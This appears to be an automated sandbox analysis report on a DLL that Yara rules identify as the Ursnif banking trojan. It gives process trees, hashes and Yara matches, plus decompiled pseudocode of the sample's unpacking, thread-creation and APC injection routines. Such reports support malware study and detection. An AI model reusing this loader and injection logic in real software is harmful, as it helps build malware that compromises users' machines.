Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\iJdlvBxhYu.dll',#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6720 Parent PID: 6684

General

Start time:	18:52:30
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\iJdlvBxhYu.dll,Enterbeen
Imagebase:	0x1040000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6732 Parent PID: 6692

General

Start time:	18:52:30
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\iJdlvBxhYu.dll',#1
Imagebase:	0x1040000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.536297010.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.536331315.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.536410675.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.536390845.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.536247273.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.536484271.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.595047356.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.536426256.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.536360413.0000000005618000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6780 Parent PID: 6684

General

Start time:	18:52:33
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\iJdlvBxhYu.dll,Multiply
Imagebase:	0x1040000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6728 Parent PID: 792

General

Start time:	18:54:04
Start date:	04/05/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff721e20000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4876 Parent PID: 6728

General

Start time:	18:54:04
Start date:	04/05/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6728 CREDAT:17410 /prefetch:2
Imagebase:	0x40000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6684 Parent PID: 5920 loaddll32.exeCOMMON

Executed Functions

Function 6E101D6E, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E101D6E(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6E101800();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E6E101C4E(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6E101F56(E6E101718,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6E1012E5(_t44,  &_a4) != 0) {
					 *0x6e104138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t48 =  *_t55(_t43, 0, 0);
				if(_t48 == 0) {
					L9:
					 *0x6e104138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6E101072(_t48 + _t14);
				 *0x6e104138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48);
				E6E10105D(_t43);
				goto L11;
			}

0x6e101d75
0x6e101d7c
0x6e101d81
0x6e101e71
0x6e101e71
0x6e101d88
0x6e101d8c
0x6e101d92
0x6e101da0
0x6e101da1
0x6e101da4
0x6e101da7
0x6e101db0
0x6e101db3
0x6e101db9
0x6e101dbc
0x6e101dc3
0x6e101e6e
0x00000000
0x6e101e6e
0x6e101dcd
0x6e101e1e
0x6e101e1e
0x6e101e34
0x6e101e39
0x6e101e61
0x6e101e3b
0x6e101e3e
0x6e101e44
0x6e101e49
0x6e101e50
0x6e101e50
0x6e101e57
0x6e101e57
0x6e101e64
0x6e101e6a
0x6e101e6c
0x6e101e6c
0x00000000
0x6e101e6a
0x6e101dda
0x6e101e18
0x00000000
0x6e101e18
0x6e101ddc
0x6e101ddf
0x6e101dea
0x6e101dee
0x6e101e10
0x6e101e10
0x00000000
0x6e101e10
0x6e101df0
0x6e101df5
0x6e101dfa
0x6e101e01
0x00000000
0x00000000
0x6e101e06
0x6e101e09
0x00000000

APIs

Part of subcall function 6E101800: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E101D7A,747863F0), ref: 6E10180F
Part of subcall function 6E101800: GetVersion.KERNEL32 ref: 6E10181E
Part of subcall function 6E101800: GetCurrentProcessId.KERNEL32 ref: 6E10183A
Part of subcall function 6E101800: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E101853

GetSystemTime.KERNEL32(?,00000000,747863F0), ref: 6E101D8C
SwitchToThread.KERNEL32 ref: 6E101D92

Part of subcall function 6E101C4E: VirtualAlloc.KERNELBASE(00000000,6E101DAC,00003000,00000004,?,?,6E101DAC,00000000), ref: 6E101CA4
Part of subcall function 6E101C4E: memcpy.NTDLL(?,?,6E101DAC,?,?,6E101DAC,00000000), ref: 6E101D3B
Part of subcall function 6E101C4E: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E101DAC,00000000), ref: 6E101D56

Sleep.KERNELBASE(00000000,00000000), ref: 6E101DB3
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E101DE8
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E101E06
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E101E3E
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E101E50
CloseHandle.KERNEL32(00000000), ref: 6E101E57
GetLastError.KERNEL32(?,00000000), ref: 6E101E5F
GetLastError.KERNEL32 ref: 6E101E6C

Memory Dump Source

Source File: 00000000.00000002.592957944.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000000.00000002.592937321.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.592980876.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.593001858.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.593030817.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: c9d8bed92d3e11bafefa54c40e919724d3dce1f5ab010889cda2f94f7ff0b302
Instruction ID: a27159107fb65fc162cd01373ff29d6d235af1e235a8f52f9575b05752763881
Opcode Fuzzy Hash: c9d8bed92d3e11bafefa54c40e919724d3dce1f5ab010889cda2f94f7ff0b302
Instruction Fuzzy Hash: 6831E871A00615ABCB02DBF58C88DCF77BD9F4A3587218516F910D3144EF38DA85BB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E181302, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000078E,00003000,00000040,0000078E,6E180D58), ref: 6E1813BF
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040,6E180DBB), ref: 6E1813F6
VirtualAlloc.KERNEL32(00000000,00012AF2,00003000,00000040), ref: 6E181456
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E18148C
VirtualProtect.KERNEL32(6E100000,00000000,00000004,6E1812E1), ref: 6E181591
VirtualProtect.KERNEL32(6E100000,00001000,00000004,6E1812E1), ref: 6E1815B8
VirtualProtect.KERNEL32(00000000,?,00000002,6E1812E1), ref: 6E181685
VirtualProtect.KERNEL32(00000000,?,00000002,6E1812E1,?), ref: 6E1816DB
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E1816F7

Memory Dump Source

Source File: 00000000.00000002.593689385.000000006E180000.00000040.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 0f1f7b1b122eb33c6e72d88d935c3aa26e3bd9edeaa12e4efc1022abb1e4d76f
Instruction ID: b0ab8fad65fa23a30eac56dcbf37098ac8e8452b4087f23bf727b8370fc71a6f
Opcode Fuzzy Hash: 0f1f7b1b122eb33c6e72d88d935c3aa26e3bd9edeaa12e4efc1022abb1e4d76f
Instruction Fuzzy Hash: 07D17676208A089FDB51CF4EC8C0B5277A6FF8C320B290595ED1A9F65AD730B840DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E101E74, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e104108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e10410c;
						if( *0x6e10410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e104118;
								if( *0x6e104118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e10410c);
						}
						HeapDestroy( *0x6e104110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e104108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6e104110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e104130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E101F56(E6E101367, E6E101BFA(_a12, 1, 0x6e104118, _t41));
							 *0x6e10410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6e101e77
0x6e101e83
0x6e101e85
0x6e101e88
0x6e101efe
0x6e101f04
0x6e101f06
0x6e101f08
0x6e101f0e
0x6e101f10
0x6e101f15
0x6e101f18
0x6e101f23
0x6e101f25
0x00000000
0x00000000
0x6e101f27
0x6e101f2a
0x6e101f2c
0x00000000
0x00000000
0x00000000
0x6e101f2c
0x6e101f34
0x6e101f34
0x6e101f40
0x6e101f40
0x6e101e8a
0x6e101e8b
0x6e101eab
0x6e101eb1
0x6e101eb6
0x6e101eb8
0x6e101ef4
0x6e101ef4
0x6e101eba
0x6e101ec2
0x6e101ec9
0x6e101ed3
0x6e101edf
0x6e101ee4
0x6e101eeb
0x6e101ef0
0x00000000
0x6e101ef0
0x6e101eeb
0x6e101eb8
0x6e101e8b
0x6e101f4d

APIs

InterlockedIncrement.KERNEL32(6E104108), ref: 6E101E96
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E101EAB

Part of subcall function 6E101F56: CreateThread.KERNELBASE ref: 6E101F6D
Part of subcall function 6E101F56: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E101F82
Part of subcall function 6E101F56: GetLastError.KERNEL32(00000000), ref: 6E101F8D
Part of subcall function 6E101F56: TerminateThread.KERNEL32(00000000,00000000), ref: 6E101F97
Part of subcall function 6E101F56: CloseHandle.KERNEL32(00000000), ref: 6E101F9E
Part of subcall function 6E101F56: SetLastError.KERNEL32(00000000), ref: 6E101FA7

InterlockedDecrement.KERNEL32(6E104108), ref: 6E101EFE
SleepEx.KERNEL32(00000064,00000001), ref: 6E101F18
CloseHandle.KERNEL32 ref: 6E101F34
HeapDestroy.KERNEL32 ref: 6E101F40

Strings

Txt, xrefs: 6E101EAB

Memory Dump Source

Source File: 00000000.00000002.592957944.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000000.00000002.592937321.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.592980876.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.593001858.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.593030817.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID: Txt
API String ID: 2110400756-4033135041
Opcode ID: 2b35e0632fa5ca0d7637e5d2eb5709e970dc682a5991f8f20279368a5d4f02a9
Instruction ID: 6cc978c5e679c1389b4ccdfdeea092100804fec226bb64148560967df2004e38
Opcode Fuzzy Hash: 2b35e0632fa5ca0d7637e5d2eb5709e970dc682a5991f8f20279368a5d4f02a9
Instruction Fuzzy Hash: 88216D71B01605AFCB009FE988C898A3BA8E776268720C52DF515D3144DF389A8ABB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E101F56, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E101F56(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e104140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6e101f6d
0x6e101f73
0x6e101f77
0x6e101f82
0x6e101f8a
0x6e101f93
0x6e101f97
0x6e101f9e
0x6e101fa5
0x6e101fa7
0x6e101fad
0x6e101f8a
0x6e101fb1

APIs

CreateThread.KERNELBASE ref: 6E101F6D
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E101F82
GetLastError.KERNEL32(00000000), ref: 6E101F8D
TerminateThread.KERNEL32(00000000,00000000), ref: 6E101F97
CloseHandle.KERNEL32(00000000), ref: 6E101F9E
SetLastError.KERNEL32(00000000), ref: 6E101FA7

Memory Dump Source

Source File: 00000000.00000002.592957944.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000000.00000002.592937321.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.592980876.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.593001858.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.593030817.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: fa3439f2aa3501a516d5a62803b1a0b9611b688b0b917ea8d0b8ee5817e10d89
Instruction ID: 13e70a81b19f2b7ef82f8a7e0a6b47ce7741b533ea567c60b7ff914e42945fd8
Opcode Fuzzy Hash: fa3439f2aa3501a516d5a62803b1a0b9611b688b0b917ea8d0b8ee5817e10d89
Instruction Fuzzy Hash: 8BF05E72606A20BBDB125BA08C0CF9FBB69FB0A701F01C40CF60591144CF358A16BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E101C4E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E101C4E(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6e104130;
				_t39 = E6E101FDA(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6e104140;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6e1051a7; // 0x6e1051a7
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6E1015DC(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80, 0x400);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6e104140 = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x6e101c55
0x6e101c65
0x6e101c6a
0x6e101c6f
0x6e101c84
0x6e101c8b
0x6e101c90
0x6e101ca1
0x6e101ca4
0x6e101caa
0x6e101caf
0x6e101d5e
0x6e101cb5
0x6e101cb5
0x6e101cb9
0x6e101d26
0x6e101cbb
0x6e101cbb
0x6e101cbe
0x6e101cc0
0x6e101cc8
0x6e101ccb
0x6e101cce
0x6e101cd6
0x6e101cde
0x6e101cdf
0x6e101ce0
0x6e101ce7
0x6e101ce7
0x6e101d00
0x6e101d05
0x6e101d0e
0x6e101d15
0x6e101d18
0x6e101d1a
0x6e101d21
0x00000000
0x00000000
0x6e101cd3
0x6e101cd3
0x6e101d23
0x6e101d30
0x6e101d45
0x6e101d32
0x6e101d3b
0x6e101d40
0x6e101d56
0x6e101d56
0x6e101d65
0x6e101d6b

APIs

VirtualAlloc.KERNELBASE(00000000,6E101DAC,00003000,00000004,?,?,6E101DAC,00000000), ref: 6E101CA4
memcpy.NTDLL(?,?,6E101DAC,?,?,6E101DAC,00000000), ref: 6E101D3B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E101DAC,00000000), ref: 6E101D56

Strings

May 3 2021, xrefs: 6E101CD6

Memory Dump Source

Source File: 00000000.00000002.592957944.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000000.00000002.592937321.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.592980876.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.593001858.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.593030817.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: May 3 2021
API String ID: 4010158826-2742910968
Opcode ID: ca8f1f1c2a4c1cf5bacafa307cdf60196957d430e6ba9b7d8b4e0e661c53bb16
Instruction ID: 9817e44024ed5fcfaea1944983f46f00d7775b46efe77252480d2059fc04898d
Opcode Fuzzy Hash: ca8f1f1c2a4c1cf5bacafa307cdf60196957d430e6ba9b7d8b4e0e661c53bb16
Instruction Fuzzy Hash: 03318371E0061A9FDF00CF99C884ADEBBB5FF49308F108129E500BB244DB75AA4ADB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E101367, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E101367(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E101D6E(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e101370
0x6e101375
0x6e101383
0x6e101388
0x6e101388
0x6e10138e
0x6e101393
0x6e101397
0x6e10139b
0x6e10139b
0x6e1013a5
0x6e1013ae

APIs

GetCurrentThread.KERNEL32 ref: 6E10136A
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E101375
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E101388
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E10139B

Memory Dump Source

Source File: 00000000.00000002.592957944.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000000.00000002.592937321.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.592980876.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.593001858.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.593030817.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 51716a40f273f46a5f0843026c3e12506e1fc49b44695e2dee4fbb57ebdac87e
Instruction ID: 8e40fa8d76fa2d5a599a57f70c8ed44093b4e802159f825525c58a042b8b4017
Opcode Fuzzy Hash: 51716a40f273f46a5f0843026c3e12506e1fc49b44695e2dee4fbb57ebdac87e
Instruction Fuzzy Hash: E2E022303076116FE6016B684C88E6F776CEFA2334711833AF821D22D0CF648C06AAB0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E14A8B9, Relevance: 16.7, APIs: 11, Instructions: 162COMMON

Download Yara Rule

APIs

___crtGetLocaleInfoA.LIBCMT ref: 6E14A90B

Part of subcall function 6E15185F: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E15186B
Part of subcall function 6E15185F: __crtGetLocaleInfoA_stat.LIBCMT ref: 6E151880

GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6E14A91D
___crtGetLocaleInfoA.LIBCMT ref: 6E14A93D
___crtGetLocaleInfoA.LIBCMT ref: 6E14A97F
__calloc_crt.LIBCMT ref: 6E14A952

Part of subcall function 6E14B167: __calloc_impl.LIBCMT ref: 6E14B176

__calloc_crt.LIBCMT ref: 6E14A994
_free.LIBCMT ref: 6E14A9AC
_free.LIBCMT ref: 6E14A9EC
__calloc_crt.LIBCMT ref: 6E14AA16
_free.LIBCMT ref: 6E14AA3C
__invoke_watson.LIBCMT ref: 6E14AA8C

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: Locale$Info$___crt__calloc_crt_free$A_statErrorLastUpdateUpdate::___calloc_impl__crt__invoke_watson
String ID:
API String ID: 1731282729-0
Opcode ID: c6a15024ae16fbdb9d2b1ea41bead50cacb5c05ea6d7fda7361c62d352e5bd64
Instruction ID: ca2c75677f100c1e818a066076be483573604fa3f62a8a238e3562f34313f5bb
Opcode Fuzzy Hash: c6a15024ae16fbdb9d2b1ea41bead50cacb5c05ea6d7fda7361c62d352e5bd64
Instruction Fuzzy Hash: C051AEB190021AEBEB648FA5CC41F9A77BDFF14314F6284A5F81996341FB318DD4AB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E16770D, Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6E167724
_wcscmp.LIBCMT ref: 6E167735
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E167751
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6E16777B

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: InfoLocale_wcscmp
String ID:
API String ID: 1351282208-0
Opcode ID: b196c93c6d8ceb80e4d6c2782ef9a7e1fcf744c8a4845c96ced683d1fee1d7f9
Instruction ID: bf744c5779ffebc8cad6c5c0c21b980a6466ba310fec1ea3a0b2e9c8029d3dde
Opcode Fuzzy Hash: b196c93c6d8ceb80e4d6c2782ef9a7e1fcf744c8a4845c96ced683d1fee1d7f9
Instruction Fuzzy Hash: 7501B53120552ABFEB509FD5D848FD637ACAF05765B218016F909DE184EB70D9E1E780

Uniqueness

Uniqueness Score: -1.00%

Function 6E101800, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E101800() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6e104130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e10413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6e10412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6e104128 = _t5;
						 *0x6e104130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6e104124 = _t6;
						if(_t6 == 0) {
							 *0x6e104124 =  *0x6e104124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x6e101801
0x6e10180f
0x6e101815
0x6e10181c
0x6e101873
0x6e101873
0x6e10181e
0x6e101826
0x6e101833
0x6e101833
0x6e10186f
0x6e101871
0x00000000
0x00000000
0x00000000
0x6e101828
0x6e10182f
0x6e101835
0x6e101835
0x6e10183a
0x6e101848
0x6e10184d
0x6e101853
0x6e101859
0x6e101860
0x6e101862
0x6e101862
0x6e10186c
0x6e101831
0x6e101831
0x00000000
0x6e101831
0x6e10182f

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E101D7A,747863F0), ref: 6E10180F
GetVersion.KERNEL32 ref: 6E10181E
GetCurrentProcessId.KERNEL32 ref: 6E10183A
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E101853

Memory Dump Source

Source File: 00000000.00000002.592957944.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000000.00000002.592937321.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.592980876.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.593001858.000000006E105000.00000004.00020000.sdmp Download File
